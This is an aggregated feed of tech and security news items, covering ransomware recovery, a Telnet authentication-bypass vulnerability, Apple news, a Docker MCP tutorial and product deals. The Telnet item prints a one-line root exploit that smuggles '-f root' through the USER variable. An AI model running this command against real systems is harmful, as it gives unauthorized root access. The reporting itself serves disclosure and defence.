Manchmal sind Reibungen aber auch notwendig und sollten gewollt sein. Ein Beispiel ist eine erzwungene Codeüberprüfung von kritischem Code, bevor er zusammengeführt wird. Wenn diese Unterbrechung, Überprüfung und Zusammenführung auf einer bewussten Entscheidung beruht, ist das eine gerechtfertigte, bewusste Reibung. Wenn das IT-Sicherheitsteam Reibungsverluste im Freigabeprozess von Entwicklern anstrebt, sollten diese auf spezifischen Anforderungen beruhen, zum Beispiel auf einer Compliance-Kontrolle, die eine manuelle Überprüfung als Teil des Change Managements vorschreibt. Diese Kontrollen sollten nicht unüberlegt eingesetzt werden. Die Reibungsverluste, die den Entwicklern entstehen, stellen Nachteile dar, die jedes vom IT-Sicherheitsteam in Betracht gezogene, nicht definierte Risiko aufwiegen könnten.
IT-Sicherheitsteams, die die Erfahrung der Entwickler als oberste Priorität betrachten, müssen die Werkzeuge und Abläufe verstehen, die für das Schreiben von Qualitätssoftware auf verschiedenen Ebenen des Stacks erforderlich sind. Die Übernahme dieser Denkweise, bei der der Entwickler im Vordergrund steht, erfordert möglicherweise Kenntnisse im Bereich Infrastruktur oder Plattform-Engineering. Andererseits kann sich der Output eines IT-Sicherheitstechnik-Teams auf andere auswirken, die ebenfalls mit der Automatisierung von Arbeitsabläufen, der Verbindung von Diensten untereinander und im Wesentlichen mit der gemeinsamen Instrumentierung einer immer größer werdenden Umgebung beschäftigt sind. All diese Arbeiten helfen den Entwicklern, schneller und mit weniger Reibungsverlusten zu arbeiten. Resultat sind mehr Flexibilität und ein schnelleres Deployment. Unabhängig davon ist dies eine Eigenschaft und ein Leitfaden, von dem ein Security-Engineering-Tem in seiner Produktivität profitiert und das Einfühlungsvermögen derer, denen es dient, fördert und kultiviert.
Fähigkeiten zur Führung und Zusammenarbeit in der Sicherheitstechnik
Security-Entwickler-Teams arbeiten nicht im luftleeren Raum, unabhängig von ihrem Umfang und ihrer Projektauslastung. Die Arbeit an der Seite und im Dienste anderer ist ein wesentlicher Bestandteil des Auftrags. Sie ist ein notwendiger Teil des Ganzen und hilft anderen, erfolgreiche Ergebnisse zu erzielen.
Kommunizieren und zusammenarbeiten
Die Mitglieder des Security-Engineering-Teams sollten in der Lage sein, miteinander und mit den Beteiligten außerhalb der Gruppe zu kommunizieren. Darüber hinaus sollten sie die Fähigkeit besitzen, gut zusammenzuarbeiten, um die gemeinsamen Ziele zu erreichen. Verstehen der Probleme, der Reibungspunkte, der Beschränkungen und der Möglichkeiten der IT-sicherheitsorientierten Entwicklung. Letztendlich ist es wichtiger, die richtigen Dinge zu tun, als einfach nur effizient zu arbeiten.
All diese Fragen müssen durch gezielte Kommunikation und Zusammenarbeit erforscht werden. Dies kann sich in menschenzentrierten Gestaltungsprinzipien, matrixbasierten Ressourcen oder einer auf Teamtopologien basierenden Ausrichtung manifestieren. Natürlich gibt es kein Patentrezept für die Kommunikation und Zusammenarbeit in und zwischen Teams. Unabhängig von der Herangehensweise sind Vertrauensbildung, Einfühlungsvermögen, Interesse an gemeinsamen Zielen und die Bereitschaft, den eigenen Stolz zugunsten der Mission zurückzustellen, die Grundlage.
Führen und andere beeinflussen
Seth Godin, Bestsellerautor und Marketingexperte, vertritt die Ansicht, dass jeder eine Führungspersönlichkeit sein kann – es ist eine Entscheidung, kein Titel. Es geht um das Zusammentreffen von Ideen, eine Lücke in der Richtung und jemanden, der motiviert genug ist, sich zu engagieren.
Der Erfolg von Security-Engineering-Teams ist, wie bei anderen Cybersecurity-Bereichen auch, von anderen abhängig. Er ist jedoch unabhängig von der Leistung des Teams, so optimal diese auch sein mag. Anders ausgedrückt: Man kann nicht einfach etwas bauen und dann gehen. Sie müssen anderen zuhören, sie einbeziehen, sie zur Übernahme bewegen und vieles mehr.
All das erfordert Führung. Genauer gesagt, Führung ohne Autorität. Die Mitglieder eines leistungsstarken Teams sollten in der Lage sein, das IT-Sicherheitstechnikteam selbst zu leiten und außerhalb der Gruppe Einfluss aufzubauen und zu nutzen. Das kann mit anderen Beteiligten oder mit internen Kunden eines Dienstes geschehen. Führen ohne Autorität bringt das Team dem Erfolg näher. Starke Beziehungen, organisatorisches Wissen und Kontext sowie technisches Fachwissen sollte zusammengebracht werden, um andere zu beeinflussen.
Soft Skills für Sicherheitsingenieure
Die Fähigkeiten eines Security Engineers und des gesamten Teams sollten über Kommunikation und Zusammenarbeit hinausgehen. In diesem Zusammenhang bezieht sich der Begriff “Soft Skills” auf die zahlreichen nichttechnischen Fähigkeiten, die eher nach innen gerichtet sind und die technischen Fähigkeiten ergänzen.
Zeit- und Prioritätenmanagement
Security-Entwickler werden immer viel zu tun haben. Die technischen Fähigkeiten führen dazu, dass häufig Anfragen zum Erstellen, Härten, Patchen oder allgemein zum Einmischen in die Software einer Umgebung eingehen werden. Zeit ist eine universelle Einschränkung für alle Teams. Aus diesem Grund müssen sowohl Einzelpersonen als auch Teams effektiver darin werden, Prioritäten zu setzen. Effizient zu sein, aber die falschen Dinge zu tun, bringt keinen Fortschritt. Es gibt viele Techniken, um Arbeit zu priorisieren, Wert gegen Komplexität abzuwägen und sich auf die Kundenzufriedenheit zu konzentrieren oder verschiedene Faktoren zu gewichten. Kunden- und Compliance-Anforderungen sind oft die treibende Kraft hinter den Prioritäten des Teams. Die Art der Prioritätensetzung ist weniger wichtig als die rücksichtslose Einhaltung der Prioritäten und der Schutz vor dem endlosen Ansturm von Anfragen, die mehr wertvolle Zeit in Anspruch nehmen.
Anpassungsfähigkeit
Security-Engineering-Teams sollten in der Lage sein, sich an veränderte Anforderungen, Technologien und Umstände anzupassen. Anpassungsfähigkeit bedeutet mehr als die Priorisierung einer Aufgabe gegenüber einer anderen: Entscheiden ist die Anpassung der Herangehensweise an ein Problem auf der Grundlage der Bedürfnisse der Beteiligten. IT-Sicherheitstechnikteams müssen sich an die Eigenverantwortung auf der Grundlage des Teamwachstums und der sich ändernden Bedürfnisse der Interessengruppen sowie an die bewusste Einbeziehung einer vielfältigen Gruppe von Stimmen in den Problemlösungsprozess anpassen. Der Nutzen für die Beteiligten und die gesamte IT-Sicherheitsorganisation liegt dabei in der Agilität und Flexibilität. Ein agiles Team ist ein widerstandsfähigeres Team.
Kontinuierliches Lernen
Ein Team, das in der Lage ist, ständig neue Fähigkeiten, organisatorische Zusammenhänge, Richtlinien und Arbeitsweisen zu erlernen, ist in der heutigen schnelllebigen Welt unbedingt notwendig. So sollten sich Mitglieder des Security Engineering-Teams ständig weiterentwickeln, sich selbst erneuern und auf bestehenden mentalen Modellen und Erfahrungen aufbauen. Dieses Konstrukt mentaler Modelle ermöglicht es Menschen, in Situationen einzutreten, die ähnliche Eigenschaften aufweisen wie etwas, an dem sie zuvor gearbeitet haben, und damit zu beginnen, etwas beizutragen, zu erforschen und zu tun.
Kontinuierliches Lernen kann sich auch auf die Kultur in einer Organisation auswirken. Wissen führt zum Austausch, Austausch führt zu Diskussionen und die Diskussion über neue Dinge weckt Interesse und Gespräche. Diese kollektive Entwicklung der mentalen Modelle, die das Unternehmen durchdringen, und der Art und Weise, wie Teams mit IT-Sicherheit umgehen und sich darauf beziehen, bringt die Kultur der Zusammenarbeit voran.
Die Arbeit in diesem hoch spezialisierten Bereich bedeutet nicht, dass sich ein leistungsstarkes Team nur auf die Technologie konzentrieren kann. Menschen, die Erforschung von Problemen, der Aufbau von Beziehungen und die Festlegung von Prioritäten sind allesamt wesentliche Bestandteile eines leistungsstarken Sicherheitstechnikteams. Achten Sie beim Aufbau Ihres Teams darauf, diese Elemente zu investieren und zu pflegen. (jm)
Lesetipp: Fehlendes Knowhow – eine Gefahr für die Anwendungssicherheit
Dieser Beitrag basiert auf einem Artikel unserer US-Schwesterpublikation CSO Online.
View the full article
CSOonline

Ransomware gang’s slip-up led to data recovery for 12 US firms

Twelve US companies hit by the INC ransomware group were able to recover encrypted data after a cybersecurity firm discovered the cloud storage infrastructure where the gang stockpiled what it stole.
Researchers at Florida-based Cyber Centaurs said Thursday they took advantage of a lapse in operational security by the gang: They found artifacts left behind by Restic, an legitimate open source backup utility the gang uses to encrypt and exfiltrate victim data into cloud storage environments it controls. Assuming the gang regularly re-uses Restic-based infrastructure led to finding an unnamed cloud storage provider where stolen data was dumped.
Unfortunately, Andrew von Ramin Mapp, Cyber Centaurs’ managing principal, admits that his firm’s work likely was no more than an “inconvenience” to the gang, because it can easily rent new cloud infrastructure.
But, he said, there are lessons for CSOs and infosec leaders from its efforts:
scrutinize and audit your backups. If you have a regular backup schedule, is there unexpected or unexplained activity? Von Ramin Mapp notes that crooks are known to time data exfiltration to match corporate off-site backups as a way to hide their work; monitor for encrypted data leaving your environments and see where it goes. Does this data go to an unexpected IP address? make sure backup software and servers are updated as soon as patches are released. Crooks take advantage of unpatched software of any kind, including backup applications. “Probably very few” infosec leaders realize that their own backup software is used against them, von Ramin Mapp said.
According to Trend Micro, the INC gang emerged in July 2023. A Linux version of its ransomware binary was seen five months later. A common tactic in its early years was to leverage vulnerabilities in Citrix Netscaler ADC and Netscaler Gateway, and researchers at Check Point Software also say the gang uses spear-phishing campaigns to capture user credentials. According to Cyber Centaurs, in smaller or flatter networks, INC operators often rely on Restic for data exfiltration prior to encryption; in larger or more complex environments, the gang favors using the backup infrastructure, such as Veeam, that’s already in place.
Cyber Centaurs was called in when a US customer’s endpoint detection and response software alerted it to an active ransomware execution on a production SQL Server. The process was quickly isolated, and it was found to be the RainINC variant.
Looking deeper, though, investigators found that multiple systems contained traces of Restic, which included renamed binaries, PowerShell scripts staging Restic execution to an S3-style cloud bucket infrastructure, repository configuration variables, and file-list driven backup commands.
While Restic wasn’t used for exfiltration in this particular attack, Cyber Centaurs suspected the gang regularly used it, based on patterns seen in other incidents. It also suspected the infrastructure the crooks used was unlikely to be dismantled even after negotiations ended or payments were made by corporate victims.
With that in mind, the incident response team developed a custom enumeration script to identify certain patterns that identify S3-style cloud bucket infrastructure that the stolen data might be going to. The script ran through a curated list of candidate repository identifiers derived from previously observed Restic artifacts. For each candidate, environment variables were set to match the configuration style used by the threat actor, including the repository endpoint and encryption password. Restic was then instructed to list available snapshots in a structured format, enabling investigators to analyze results without interacting with the underlying data.
The script explicitly avoided any operation that could alter a suspect repository or be interpreted as destructive. What the researchers did conduct was forensic enumeration, not intrusion, Cyber Centaurs stresses.
“The repositories were accessed using the attacker’s own tooling and configuration semantics, without exploitation, modification, or disruption,” its report says. “By treating the attacker’s infrastructure as evidentiary material rather than a target, investigators were able to safely validate the hypothesis of persistent, multi-victim storage, and lay the groundwork for what would become a rare and large-scale data recovery effort.”
What it discovered were stolen datasets belonging to 12 unnamed and unconnected firms hit in separate INC ransomware attacks. While the data was encrypted, Cyber Centaurs could use Restic for decryption because it was the encryption vehicle. Then it contacted law enforcement agencies to validate the stolen data’s source.
The report includes indicators of compromise and tools used by INC, including AnyDesk, a remote access application.
The report also notes that threat actors abusing Restic often rename the binary (for example, to winupdate.exe) and rely on legitimate execution paths to avoid suspicion. A simple and effective detection technique is to look for Restic execution outside expected backup contexts, especially from system directories or user-writable locations, and to pair that with known hashes where available.
Jon DiMaggio, head of XFIL Cyber and a specialist in ransomware attacks, said that what’s significant in this investigation isn’t just that stolen data from 12 companies was recovered, but that researchers exposed how ransomware groups reuse infrastructure across multiple victims. “Most ransomware incidents end once you contain the encryption and restore systems,” he said in an email. “This case shows the real value is in following the attacker’s operational patterns to find what they left behind. It’s a reminder that ransomware is a business model, not one-off attacks, and that means there are opportunities to disrupt it at scale.”
Defenders shouldn’t count on lapses like the one made by INC to rescue them from attacks, however. In its report, Cyber Centaurs says this was an opening “that would not normally exist in a typical ransomware response.” But, it adds, if there are mistakes, defenders may be able to capitalize on them.
In an interview, von Ramin Mapp cautioned that lowering the risk of being hit by ransomware isn’t easy. Attackers will respond to every tactic defenders use, he said. It will help, he noted, if victim firms refuse to pay ransoms and thus take away the financial reward gang depend on.
“One thing I often recommend to organizations,” he added, “is to have a baseline of the read and write output on your servers and network shares. If ransomware is being deployed, you will see a drastic increase in these cycles.”
View the full article
CSOonline

1Password Launches Anti-Phishing Warnings for Pasted Passwords

Popular password management app 1Password today announced the launch of a new phishing protection feature that's meant to "act as a second pair of eyes" before users provide their passwords to scammers.


1Password will not autofill a username and password on a website that is spoofing another as one layer of protection, but users can get around that by manually retrieving their usernames and passwords.

To add further protection, when a user attempts to paste their username and password into a website, the 1Password browser extension will display a pop-up warning that prompts them to pause and use caution before continuing. 1Password hopes that the warning will cause users to take a second, more careful look at the website before proceeding.

The phishing protection feature will be turned on by default for individual and family plan users, while 1Password Admins can turn it on for employees. The protection is rolling out starting today.

Pricing for 1Password starts at $2.99 per month for an individual user.Tag: 1Password
This article, "1Password Launches Anti-Phishing Warnings for Pasted Passwords" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple Accuses European Commission of 'Political Delay Tactics' Over App Store Changes

Apple claims the European Commission is refusing to let to implement App Store changes, instead using "political delay tactics" to levy unfair investigations and fines. Apple provided the statement to Bloomberg in response to MacPaw's decision to shut down alternative iOS app marketplace Setapp Mobile in the EU because of the complicated business terms that it has to deal with.



MacPaw plans to sunset Setapp Mobile in the EU on February 16, 2026. The company said it was shutting down the app because of "complex business terms that don't fit Setapp's current business model," but MacPaw did not go into further detail. Apple does indeed have a complicated fee structure in Europe, for both app marketplaces and the apps that are distributed through them. Apple allows for app marketplaces in the EU because of the Digital Markets Act, which is policed by the European Commission.

The European Commission is gearing up to blame Apple for Setapp's EU shutdown, according to information viewed by Bloomberg. "Apple has not rolled out changes to address the key issues concerning its business terms, including their complexity," the EC reportedly plans to say.

Apple says that it has not simplified its EU business terms as expected because of the European Commission's refusal to let it implement the changes.

Apple further claims that there is little demand for alternative app marketplaces in Europe, and the company said that it is not the reason that Setapp is shutting down.Tags: European Commission, European Union
This article, "Apple Accuses European Commission of 'Political Delay Tactics' Over App Store Changes" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Why is the Apple Weather App on the iPhone Predicting So Much Snow?

A major storm system is expected to deliver significant snowfall and freezing rain across more than half of the United States this weekend, with winter weather alerts in effect in cities like Atlanta, Baltimore, Boston, Charlotte, Cleveland, Dallas, Indianapolis, Nashville, New York, Philadelphia, Raleigh, Washington D.C., and others.


On the iPhone, iPad, and Mac, the Apple Weather app has forecasted up to two feet of snowfall in some cities, which has led to a lot of discussion on social media platforms like Reddit. However, as The New York Times noted, meteorologists caution that it can be difficult to forecast specific precipitation amounts several days in advance of a storm.

As the low-pressure system approaches, and its path becomes more clear, snowfall amounts shown in the Apple Weather app have decreased in many cities compared to what was originally forecasted. In some areas, there may only be freezing rain and sleet. By all accounts, though, the storm is shaping up to be a significant event.

What is behind the Apple Weather app's forecasts?

In 2020, Apple acquired the popular weather app Dark Sky, and it has since integrated the app's features and hyperlocal forecasts into the Apple Weather app. In a support document, however, Apple says that it still gathers at least some weather data from sources including the U.S. National Weather Service, The Weather Channel, and others.

In the U.S., you can receive severe weather and next-hour precipitation notifications on your iPhone by opening the Apple Weather app, tapping on the list icon in the bottom-right corner, tapping on the three dots in the top-right corner, selecting Notifications, and turning on both types of notifications under Current Location.Tag: Apple Weather
This article, "Why is the Apple Weather App on the iPhone Predicting So Much Snow?" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Trivial Telnet authentication bypass exposes devices to complete takeover

Computers with Telnet open are in immediate danger of being compromised due to a critical vulnerability that allows attackers to bypass authentication.
The Telnet remote access protocol has long been superseded by the more secure and encrypted SSH, but many IoT and embedded devices have continued to ship with Telnet exposed on the LAN interface for debugging purposes over the years.
Making things worse, the vulnerability, now tracked as CVE-2026-24061, is trivial to exploit remotely, and because it has existed in the codebase for the past 11 years since version 1.9.3, it likely impacts many devices that are no longer supported and will not receive firmware updates.
Trivial exploitation
“The telnetd server invokes /usr/bin/login (normally running as root) passing the value of the USER environment variable received from the client as the last parameter,” Simon Josefsson, a GNU contributor who submitted the patch, said on the OSS-SEC mailing list. “If the client supplies a carefully crafted USER environment value being the string “-f root”, and passes the telnet(1) -a or --login parameter to send this USER environment to the server, the client will be automatically logged in as root bypassing normal authentication processes.”
In other words, the exploit is achieved with the simple command: USER=‘-f root’ telnet -a [host_ip]. This not only works against remote systems, but it can also serve as a privilege escalation exploit on the local machine if the telnet service (telnetd) is running.
Telnet is part of inetutils, the GNU network utilities package shipped with all Linux and other UNIX-based systems. Users are advised to deploy the patch as soon as possible or update to a patched version offered by their distribution. As a temporary mitigation, users are advised to either disable the telnet service entirely or filter access to it to only allow white-listed IP addresses.
Scan enterprise networks
The Telnet server should never be exposed to the internet in this day and age, but misconfigured servers and IoT devices that have it enabled continue to exist. These will be easily compromised by IoT worms and botnet malware. Malicious traffic monitoring service GreyNoise is already seeing attempts to exploit this vulnerability.
It’s more common to find Telnet exposed inside local networks, despite the fact that, given that it’s an obsolete program, it shouldn’t be used at all. Organizations should scan their networks and immediately isolate and firewall Telnet-enabled devices because all it takes is a malware infection on any other computer on the network for attackers to have an opportunity to exploit them. Executing this attack doesn’t require any special privileges, as low-privileged users can typically initiate telnet connections.


View the full article
CSOonline

Get Super Bowl Ready With Samsung's Big Sale on TVs and Monitors

Samsung recently kicked off a sale across its most popular Vision AI-supported monitors and TVs, with notable markdowns on products like The Frame and the Smart Monitor series. These deals have all been applied automatically on Samsung's website, and many match all-time low prices on these products.

Note: MacRumors is an affiliate partner with Samsung. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Starting with monitors, you can get the 32-inch Smart Monitor M9 4K OLED for $1,299.99, down from $1,599.99. This version of the Smart Monitor line launched last summer, and Samsung's discount today is a match of the record low price on the display.

$300 OFF32-inch Smart Monitor M9 for $1,299.99

Another notable monitor discount is the 43-inch Smart Monitor M7 in White for $359.99, down from $499.99. You'll also find the 32-inch Smart Monitor M8 for $399.99, down from $699.99.


Regarding TVs, there are quite a few models of The Frame TV on sale, including all-time low prices on The Frame models from 2025. You can get the 2025 65-inch The Frame TV for $1,199.99 ($600 off), as well as the 75-inch Frame Pro for $1,999.99 ($1,200 off), a match of the all-time low price.

$600 OFF65-inch The Frame for $1,199.99
$1,200 OFF75-inch The Frame Pro for $1,999.99

For even more savings, anyone interested can watch Samsung's Super Bowl-themed Vision AI commercial to stack on an extra 10 percent off at checkout. The video is under 1 minute long, so it's worth it if you're shopping for one of Samsung's high-end TVs or monitors this month.

TVs

55-inch QLED QEF1 Smart TV - $349.99, down from $599.99
55-inch QLED Q7F Smart TV - $399.99, down from $529.99
55-inch QLED Q8F Smart TV - $699.99, down from $749.99
75-inch Vision AI Smart TV - $599.99, down from $1,199.99
50-inch The Frame - $799.99, down from $1,099.99
75-inch Neo QLED QN70F Smart TV - $1,199.99, down from $1,599.99
65-inch The Frame - $1,199.99, down from $1,799.99
55-inch OLED S95F Smart TV - $1,899.99, down from $2,299.99
75-inch The Frame Pro - $1,999.99, down from $3,199.99
85-inch The Frame Pro - $3,299.99, down from $4,299.99
85-inch Neo QLED QN90F Smart TV - $2,299.99, down from $4,499.99
Monitors

32-inch ViewFinity S70A UHD Monitor - $299.99, down from $459.99
43-inch Smart Monitor M7 - $359.99, down from $499.99
32-inch Smart Monitor M8 - $399.99, down from $699.99
27-inch Odyssey OLED G6 Gaming Monitor - $749.99, down from $999.99
49-inch Odyssey OLED G9 Gaming Monitor - $849.99, down from $1,299.99
32-inch Smart Monitor M9 - $1,299.99, down from $1,599.99
Galaxy Products

Galaxy XR - Save up to $1,140 with the Explorer Pack
Galaxy S25 Ultra - Save up to $700 in instant trade-in credit
Galaxy Ring - Get up to $150 trade-in credit
Galaxy Watch Ultra - Save up to $250
Galaxy Watch 8 - Save up to $200

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Get Super Bowl Ready With Samsung's Big Sale on TVs and Monitors" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple's F1 Movie Nominated for Best Picture at 2026 Oscars

Popular Apple racing movie F1 has been nominated for Best Picture by the Academy of Motion Picture Arts and Sciences, Apple said today. Nominees were announced for the 98th annual Academy Awards, and Apple earned six nominations in total.


F1, which stars Brad Pitt, will be up against Bugonia, Frankenstein, Hamnet, Marty Supreme, One Battle After Another, Sinners, Sentimental Value, The Secret Agent, and Train Dreams for the Best Picture Award. The film was also nominated for Best Sound, Best Film Editing, and Best Visual Effects.

Apple documentary Come See Me in the Good Light was nominated for Best Documentary Feature Film, and The Lost Bus was nominated for Best Visual Effects.

F1 was the highest-grossing sports feature of all time, according to Apple, and one of the company's most successful films to date. It earned over $631 million worldwide during its theatrical run. Apple says that its films, documentaries, and shows have earned 687 total wins and 3,229 award nominations since the Apple TV service launched in 2019.

The 98th annual Academy Award winners will be revealed on Sunday, March 15.Tag: Apple TV Plus
This article, "Apple's F1 Movie Nominated for Best Picture at 2026 Oscars" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Using MCP Servers: From Quick Tools to Multi-Agent Systems

Model Context Protocol (MCP) servers are a spec for exposing tools, models, or services to language models through a common interface. Think of them as smart adapters: they sit between a tool and the LLM, speaking a predictable protocol that lets the model interact with things like APIs, databases, and agents without needing to know implementation details.
But like most good ideas, the devil’s in the details.
The Promise—and the Problems of Running MCP Servers
Running an MCP sounds simple: spin up a Python or Node server that exposes your tool. Done, right? Not quite.
You run into problems fast:
Runtime friction: If an MCP is written in Python, your environment needs Python (plus dependencies, plus maybe a virtualenv strategy, plus maybe GPU drivers). Same goes for Node. This multiplies fast when you’re managing many MCPs or deploying them across teams. Secrets management: MCPs often need credentials (API keys, tokens, etc.). You need a secure way to store and inject those secrets into your MCP runtime. That gets tricky when different teams, tools, or clouds are involved. N×N integration pain: Let’s say you’ve got three clients that want to consume MCPs, and five MCPs to serve up. Now you’re looking at 15 individual integrations. No thanks. To make MCPs practical, you need to solve these three core problems: runtime complexity, secret injection, and client-to-server wiring. 
If you’re wondering where I’m going with all this, take a look at those problems. We already have a technology that has been used by developers for over a decade that helps solve them: Docker containers.
In the rest of this blog I’ll walk through three different approaches, going from least complex to most complex, for integrating MCP servers into your developer experience. 
Option 1 — Docker MCP Toolkit & Catalog
For the developer who already uses containers and wants a low-friction way to start with MCP.
If you’re already comfortable with Docker but just getting your feet wet with MCP, this is the sweet spot. In the raw MCP world, you’d clone Python/Node servers, manage runtimes, inject secrets yourself, and hand-wire connections to every client. That’s exactly the pain Docker’s MCP ecosystem set out to solve.
Docker’s MCP Catalog is a curated, containerized registry of MCP servers. Each entry is a prebuilt container with everything you need to run the MCP server. 
The MCP Toolkit (available via Docker Desktop) is your control panel: search the catalog, launch servers with secure defaults, and connect them to clients.
How it helps:
No language runtimes to install Built-in secrets management One-click enablement via Docker Desktop Easily wire the MCPs to your existing agents (Claude Desktop, Copilot in VS Code, etc) Centralized access via the MCP Gateway Figure 1: Docker MCP Catalog: Browse hundreds of MCP servers with filters for local or remote and clear distinctions between official and community servers
A Note on the MCP Gateway
One important piece working behind the scenes in both the MCP Toolkit and cagent (a framework for easily building multi-agent applications that we cover below) is the MCP Gateway, an open-source project from Docker that acts as a centralized frontend for all your MCP servers. Whether you’re using a GUI to start containers or defining agents in YAML, the Gateway handles all the routing, authentication, and translation between clients and tools. It also exposes a single endpoint that custom apps or agent frameworks can call directly, making it a clean bridge between GUI-based workflows and programmatic agent development.
Moving on: Using MCP servers alongside existing AI agents is often the first step for many developers. You wire up a couple tools, maybe connect to a calendar or a search API, and use them in something like Claude, ChatGPT, or a small custom agent. For step-by-step tutorials on how to automate dev workflows with Docker’s MCP Catalog and Toolkit with popular clients, check out these guides on ChatGPT, Claude Desktop,Codex, Gemini CLI, and Claude Code. 
Once that pattern clicks, the next logical step is to use those same MCP servers as tools inside a multi-agent system.
Option 2 — cagent: Declarative Multi-Agent Apps
For the developer who wants to build custom multi-agent applications but isn’t steeped in traditional agentic frameworks.
If you’re past simple MCP servers and want agents that can delegate, coordinate, and reason together, cagent is your next step. It’s Docker’s open-source, YAML-first framework for defining and running multi-agent systems—without needing to dive into complex agent SDKs or LLM loop logic.
Cagent lets you describe:
The agents themselves (model, role, instructions) Who delegates to whom What tools each agent can access (via MCP or local capabilities) Below is an example of a pirate flavored chat bot:
agents: root: description: An agent that talks like a pirate instruction: Always answer by talking like a pirate. welcome_message: | Ahoy! I be yer pirate guide, ready to set sail on the seas o' knowledge! What be yer quest? model: auto cagent run agents.yaml You don’t write orchestration code. You describe what you want, and Cagent runs the system.

Why it works:
Tools are scoped per agent Delegation is explicit Uses MCP Gateway behind the scene Ideal for building agent systems without writing Python If you’d like to give cagent a try, we have a ton of examples in the project’s GitHub repository. Check out this guide on building multi-agent systems in 5 minutes. 
Option 3 — Traditional Agent Frameworks (LangGraph, CrewAI, ADK)
For developers building complex, custom, fully programmatic agent systems.

Traditional agent frameworks like LangGraph, CrewAI, or Google’s Agent Development Kit (ADK) let you define, control, and orchestrate agent behavior directly in code. You get full control over logic, state, memory, tools, and workflows.
They shine when you need:
Complex branching logic Error recovery, retries, and persistence Custom memory or storage layers Tight integration with existing backend code Example: LangGraph + MCP via Gateway
import requests from langgraph.graph import StateGraph from langchain.agents import Tool from langchain_openai import ChatOpenAI # Discover MCP endpoint from Gateway resp = requests.get("http://localhost:6600/v1/servers") servers = resp.json()["servers"] duck_url = next(s["url"] for s in servers if s["name"] == "duckduckgo") # Define a callable tool def mcp_search(query: str) -> str: return requests.post(duck_url, json={"input": query}).json()["output"] search_tool = Tool(name="web_search", func=mcp_search, description="Search via MCP") # Wire it into a LangGraph loop llm = ChatOpenAI(model="gpt-4") graph = StateGraph() graph.add_node("agent", llm.bind_tools([search_tool])) graph.add_edge("agent", "agent") graph.set_entry_point("agent") app = graph.compile() app.invoke("What’s the latest in EU AI regulation?") In this setup, you decide which tools are available. The agent chooses when to use them based on context, but you’ve defined the menu.
And yes, this is still true in the Docker MCP Toolkit: you decide what to enable. The LLM can’t call what you haven’t made visible.

Choosing the Right Approach
Approach
Best For
You Manage
You Get
Docker MCP Toolkit + Catalog
Devs new to MCP, already using containers
Tool selection
One-click setup, built-in secrets, Gateway integration
Cagent
YAML-based multi-agent apps without custom code
Roles & tool access
Declarative orchestration, multi-agent workflows
LangGraph / CrewAI / ADK
Complex, production-grade agent systems
Full orchestration
Max control over logic, memory, tools, and flow
Wrapping Up
Whether you’re just connecting a tool to Claude, designing a custom multi-agent system, or building production workflows by hand, Docker’s MCP tooling helps you get started easily and securely. 
Check out the Docker MCP Toolkit, cagent, and MCP Gateway for example code, docs, and more ways to get started.

View the full article
reporter

Apple's John Ternus Takes Over Design in Latest CEO Succession Move

Apple's hardware chief John Ternus has been overseeing Apple design teams since late last year as Apple continues preparing him to take over as CEO, reports Bloomberg.


Apple CEO Tim Cook put Ternus in charge of the design teams the final months of 2025, expanding his responsibilities. Apple's software and hardware design teams were most recently managed by former Apple chief operating officer Jeff Williams, who retired from Apple in 2025. When Williams retired, Apple said the design teams would report directly to Cook, but Cook apparently handed the reins to Ternus.

Design is one of the most important divisions at Apple, and it has always been led by a senior executive. Jony Ive was in charge of the design team before he left and it was given to Williams.

Ternus is apparently the "executive sponsor" of all design on Cook's management team, which means he handles communications between design staff and the executive team. He represents the design team in executive gatherings, and manages design team leaders.

Bloomberg claims that inside sources said Cook is aiming to expose Ternus to more parts of the company's operations. Design decisions are made by consensus, so while Ternus is taking on a larger role, software engineering chief Craig Federighi and marketing chief Greg Joswiak continue to have a say in Apple's overall aesthetic.

Multiple reports have suggested that Ternus is the most likely candidate to take on the role of Apple CEO when Cook retires. Cook turned 65 last year, but there do not appear to be any imminent plans for his retirement. Ternus is Apple's youngest senior executive at 50, so he could have a long run if he is eventually promoted to CEO.

Ternus leads Apple's hardware engineering team, and he has been described as having an even temperament, strong attention to detail, and intimate knowledge of Apple's supply chain. Some at Apple fear that he is too risk averse, inexperienced with geopolitical issues, and not charismatic enough to run Apple.Tag: John Ternus
This article, "Apple's John Ternus Takes Over Design in Latest CEO Succession Move" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

New Osiris Ransomware Emerges as New Strain Using POORTRY Driver in BYOVD Attack

Cybersecurity researchers have disclosed details of a new ransomware family called Osiris that targeted a major food service franchisee operator in Southeast Asia in November 2025. The attack leveraged a malicious driver called POORTRY as part of a known technique referred to as bring your own vulnerable driver (BYOVD) to disarm security software, the Symantec and Carbon Black Threat HunterView the full article
Hacker News

MacBook Pro to Receive Up to Six New Features by Next Year

Apple is expected to release MacBook Pro models with M5 Pro and M5 Max chips soon, but you might want to pass on them, as bigger changes are around the corner.


It has been reported that the MacBook Pro will be receiving a major redesign in late 2026 or in 2027. Six new features have been rumored so far, including an OLED display, touch capabilities, a Dynamic Island, M6 Pro and M6 Max chips manufactured with TSMC's advanced 2nm process, a thinner design, and built-in cellular connectivity.

The exact launch timing remains to be seen. Apple has updated the MacBook Pro twice in one year in the past, with the M2 Pro and M2 Max models debuting in January 2023 and the M3 Pro and M3 Max models following in October 2023, so there is a chance that the M5 Pro and M5 Max models could debut soon and the models with OLED displays could follow later this year. However, 2027 seems like a safer bet for now.

Keep in mind that the entry-level 14-inch MacBook Pro with the M6 chip is not expected to receive many of the changes listed below.

Apple last redesigned the MacBook Pro in 2021, when the M1 Pro and M1 Max models launched.

OLED Display

Bloomberg's Mark Gurman and others have indicated that the two-generations-away MacBook Pro models will have OLED displays.

The current MacBook Pro models are equipped with LCD displays with mini-LED backlighting. The move to OLED technology would result in improved image quality, thanks to richer colors and higher contrast ratio with true blacks.

All of the iPhone, Apple Watch, and iPad Pro models that Apple sells today are already equipped with OLED displays, excluding refurbished models.

Touch Screen

